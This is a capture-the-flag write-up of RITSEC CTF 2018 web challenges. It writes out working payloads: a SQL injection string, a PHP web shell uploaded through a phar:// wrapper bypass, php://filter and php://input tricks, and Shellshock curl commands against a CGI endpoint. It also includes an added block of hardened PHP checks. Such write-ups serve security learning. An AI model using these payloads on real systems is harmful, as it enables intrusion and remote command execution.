RITSEC CTF 2018 Web-WriteUp

A burnt-out player checking in..

Space Force-100

The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!

Author: neon_spandex

The home page has a search box and a table of data.

Tried searching for the entry The Javelin.

Searching for * returned nothing; trying an injection produced an error.

Sending the payload gave the flag directly (no idea why :( )..

```
SS Roosevelt'or 1=1#
```

```
RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
```

The Tangled Web-200

fun.ritsec.club:8007

Author: jok3r

The site's home page has a lot of pages linked to one another,

wget the lot (wget rules; a Python crawler script to follow)

```shell
wget -r -l 0 http://fun.ritsec.club:8007/
```

Among the files is an HTML file named Fl4gggg1337

cat shows it doesn't contain the flag, but it points to another HTML file named Stars

Opening that one returns a suspicious-looking string

```shell
root@ubuntu:/ctf/fun.ritsec.club:8007# echo "UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0=" | base64 -d
RITSEC{AR3_Y0U_F3371NG_1T_N0W_MR_KR4B5?!}
```

Crazy Train-250

fun.ritsec.club:3000

Author: hulto

The landing page looks like this

Clicking through

This string shows up in the source

Googling shows it's written in Ruby.. oof

There is a "create a post" feature, nothing suspicious

The source hides an input box

After changing its attributes, whatever goes into this box gets evaluated

In the end this box allows direct command execution...

cat the flag directly

```
RITSEC{W0wzers_who_new_3x3cuting_c0de_to_debug_was_@_bad_idea}
```

Archivr-300

Please note that this challenge is currently down. We are working on the issue and will update when it is back up.

fun.ritsec.club:8004

Author: jwood

This is a file-upload challenge with the following restrictions

```
Max upload size 5 KB
Uploaded files are destroyed automatically after a few minutes
PHP files with case tricks can't be uploaded (uppercase, mixed case and php5 all fail), but pht, phtml, php, zip etc. can be uploaded
Files without an extension, or with a php extension, are automatically renamed to a .dat extension
After upload the file name is changed to the format (number + .txt) and the file can be reached through that URI
Content-Type isn't checked, so a png file containing PHP code can be uploaded (didn't help), etc.
```

On the download page the URL shows

http://fun.ritsec.club:8004/index.php?page=download

So through

http://fun.ritsec.club:8004/index.php?page=php://filter/convert.base64-encode/resource=download

the upload source can be read

```php
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    if ($_FILES['upload']['size'] > 5000)
    { //max 5KB
        die("File too large!");
    }
    $filename = $_FILES['upload']['name'];
    $upload_time = time();
    $upload_dir = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/";
    $ext = "";
    if (strpos($filename, '.') !== false)
    {
        $f_ext = explode(".", $filename) [1];
        if (ctype_alnum($f_ext) && stripos($f_ext, "php") === false && stripos($f_ext, "pht") === false)
        {
            $ext = "." . $f_ext;
        }
        else
        {
            $ext = ".dat";
        }
    }
    else
    {
        $ext = ".dat";
    }
    $upload_path = $upload_dir . md5($upload_time) . $ext;
    mkdir($upload_dir, 0770, true);
    // Enforce maximum of 10 files
    $dir = new DirLister($upload_dir);
    if ($dir->getCount() >= 10)
    {
        unlink($upload_dir . $dir->getOldestFile());
    }
    move_uploaded_file($_FILES['upload']['tmp_name'], $upload_path);
    $key = $upload_time . $ext;
}
?>

<html>
<head>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <style>
        body {
            padding-top: 70px;
        }
        .fineprint {
            font-size: 2px;
            color: red;
        }
    </style>
</head>
<body>
    <nav class="navbar navbar-inverse navbar-fixed-top">
        <div class="container">
            <div class="navbar-header">
                <a class="navbar-brand" href="/">Archivr</a>
            </div>
            <div id="navbar" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                    <li><a href="index.php?page=home">Home</a></li>
                    <li class="active"><a href="index.php?page=upload">Upload</a></li>
                    <li><a href="index.php?page=download">Download</a></li>
                </ul>
            </div>
        </div>
    </nav>
    <div class="container">
        <?php
        if (isset($key))
        {
        ?>
        <div class="alert alert-success" role="alert">
            File uploaded! Retrieval key: <strong><?php echo $key; ?></strong>
        </div>
        <?php
        }
        ?>
        <h3>File Upload</h3>
        <form action="index.php?page=upload" method="post" enctype="multipart/form-data">
            <div class="col-xs-4">
                <div class="form-group">
                    <label for="upload">Select a &lt;5KB file</label>
                    <input type="file" class="form-control-file" id="upload" name="upload">
                </div>
                <div class="form-group">
                    <button type="submit" class="btn btn-primary">Upload</button>
                </div>
            </div>
        </form>
    </div>
</body>
</html>
```

So the upload path is

```
uploads/md5(REMOTE_ADDR)/md5(time()).ext
```

The stored file name can be computed from time() (a Unix timestamp).

And deletion is by file count: once the directory holds 10 files the oldest one is unlinked (not by time).

Next, the source of download.php

```php
<?php
if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $key = $_POST['key'];
    if (strpos($key, '.') !== false) {
        $key_parts = explode(".", $key);
        $hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];

        $path = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/" . $hashed_key;
        if (file_exists($path)) {
            header("Content-Disposition: attachment; filename=\"" . $key . "\"");
            die(file_get_contents($path));
        } else {
            $error = "File not found!";
        }
    } else {
        $error = "Invalid key!";
    }
}
?>
```

The download path is built from the md5 of the requesting IP and the hashed key

```php
$key_parts = explode(".", $key);
$hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];
// $key is the retrieval key returned by the upload page
$upload_dir = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/";
```

home.php

```php
<?php
include("classes.php.inc");
include((isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : "home") . ".php");
?>
```
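The two weak spots the rest of this challenge leans on are the extension check in upload.php (only the part after the first dot is inspected, and only the substrings php/pht are denied) and the unfiltered include above (any stream wrapper in page= is accepted). As an added example that is not part of the challenge or this write-up, here is how both checks look hardened; the allowlists and function names are assumptions, not the challenge's code:

```php
<?php
// Added example, not the challenge's code: hardened versions of the two
// checks that the Archivr source above gets wrong. Allowlists are assumed.

// 1. Extension check. The original inspects explode(".", $name)[1], the part
//    after the FIRST dot, and only denies the substrings "php"/"pht". Here the
//    part after the LAST dot is compared against an explicit allowlist.
const ALLOWED_EXT = ['txt', 'png', 'jpg', 'pdf'];

function safe_extension(string $filename): string
{
    $base = basename($filename);            // ignore any path component
    $dot  = strrpos($base, '.');
    if ($dot === false) {
        return '.dat';
    }
    $ext = strtolower(substr($base, $dot + 1));
    return in_array($ext, ALLOWED_EXT, true) ? '.' . $ext : '.dat';
}

// 2. Stored file name. md5(time()) is guessable to the second (the write-up
//    recomputes it from the returned key); a random token is not.
function random_stored_name(string $ext): string
{
    return bin2hex(random_bytes(16)) . $ext;
}

// 3. Page include. The original does include($_GET['page'] . ".php"), which
//    accepts php://filter, phar:// and any other wrapper. Map the parameter
//    through a fixed table so only known files can ever be included.
const PAGES = ['home' => 'home.php', 'upload' => 'upload.php', 'download' => 'download.php'];

function resolve_page(?string $page): string
{
    return PAGES[$page ?? 'home'] ?? PAGES['home'];
}

// Constructed inputs based on the bypasses discussed in this write-up.
var_dump(safe_extension('shell.zip.php'));   // ".dat"  (original check: ".zip")
var_dump(safe_extension('shell.phtml'));     // ".dat"
var_dump(safe_extension('shell.PHP'));       // ".dat"
var_dump(safe_extension('notes.TXT'));       // ".txt"
var_dump(resolve_page('php://filter/convert.base64-encode/resource=download')); // "home.php"
var_dump(resolve_page('phar://uploads/anything'));                              // "home.php"
var_dump(resolve_page('download'));                                             // "download.php"
```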

Tried accessing the upload directory /uploads/md5(MY_PUBLIC_IP)/

but always got a 404, and then a hint was released

https://en.wikipedia.org/wiki/Reverse_proxy

Still no luck, so I picked up the approach from other players

PS: since all the challenges run in the same environment, the curl in What a cute dog shows the remote IP is 10.0.10.254

```shell
root@ubuntu:~# curl -d "<?=phpinfo();?>" -X POST http://fun.ritsec.club:8007/devsrule.php?magic=php://input | grep "REMOTE"
```

Visiting that path returns 403 Forbidden, so it can't be browsed directly, but the directory does exist!

Then, given the challenge name Archivr, it feels like a phar:// wrapper bypass

Reference

php: phar protocol

Using the $key returned from uploading shell.zip, quickly compute the file's path and, while the file still exists (the path is valid), get a shell through phar://

Calculation script

```php
<?php
$key = "xxxxxxxxxx.zip"; // retrieval key returned by the upload page
$key_parts = explode(".", $key);
$hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];
$path = "uploads/" . md5("10.0.10.254") . "/" . $hashed_key;
echo $path;
?>
```

The shell, zipped up and uploaded

```php
<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
```

Read the flag

```
RITSEC{uns3r1al1z3_4LL_th3_th1ng5}
```

What a cute dog!-350

This dog is shockingly cute!

fun.ritsec.club:8008

Author: sandw1ch

Looking at the page source reveals a /cgi-bin/stats endpoint

It turns out to be a Ruby CVE, number 2014-6271,

References

shellshock

vaas-cve-2014-6271

Just throw the payload at it

```shell
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats
```

Flag

```
RITSEC{sh3ll_sh0cked_w0wz3rs}
```

Lazy Dev-400

fun.ritsec.club:8007

Author: jok3r

Hint (carried over from The Tangled Web):

```html
<!-- REMOVE THIS NOTE LATER -->
<!-- Getting remote access is so much work. Just do fancy things on devsrule.php -->
```

Following the hint to devsrule.php returns

```
Not what you input eh?
This param is 'magic' man.
```

Tried sending magic=1, flag, true and so on with no luck; in the end php://input got past it and gave command execution, listing the directory

```
A.html
AH.html
AHA.html
AHAAHAH.html
AHH.html
AHHHA.html
AHHHHH.html
Ah.html
Ahhh.html
Away.html
Be.html
Believe.html
Call.html
Can.html
Eyes.html
Feel.html
Fireflies.html
Fl4gggg1337.html
Freedom.html
From.html
Gang.html
Get.html
Give.html
Gonna.html
Gucci.html
Ha.html
I.html
If.html
Is.html
Its.html
JokersSomeSortaHack
Just.html
Like.html
Lot.html
Love.html
Me.html
Million.html
More.html
Never.html
Not.html
Older.html
Once.html
Roll.html
Somebody.html
Stars.html
Stronger.html
Take.html
Tell.html
Ten.html
The.html
Theyll.html
To.html
Told.html
Tonight.html
Up.html
Waving.html
When.html
Will.html
World.html
Would.html
You.html
Your.html
devsrule.php
images
index.html
```

I thought the flag was as good as caught, but visiting Fl4gggg1337.html...

Finally, /etc/passwd showed a suspicious joker directory

```
RITSEC{WOW_THAT_WAS_A_PAIN_IN_THE_INPUT}
```

References

php: phar protocol

shellshock

vaas-cve-2014-6271

php://filter
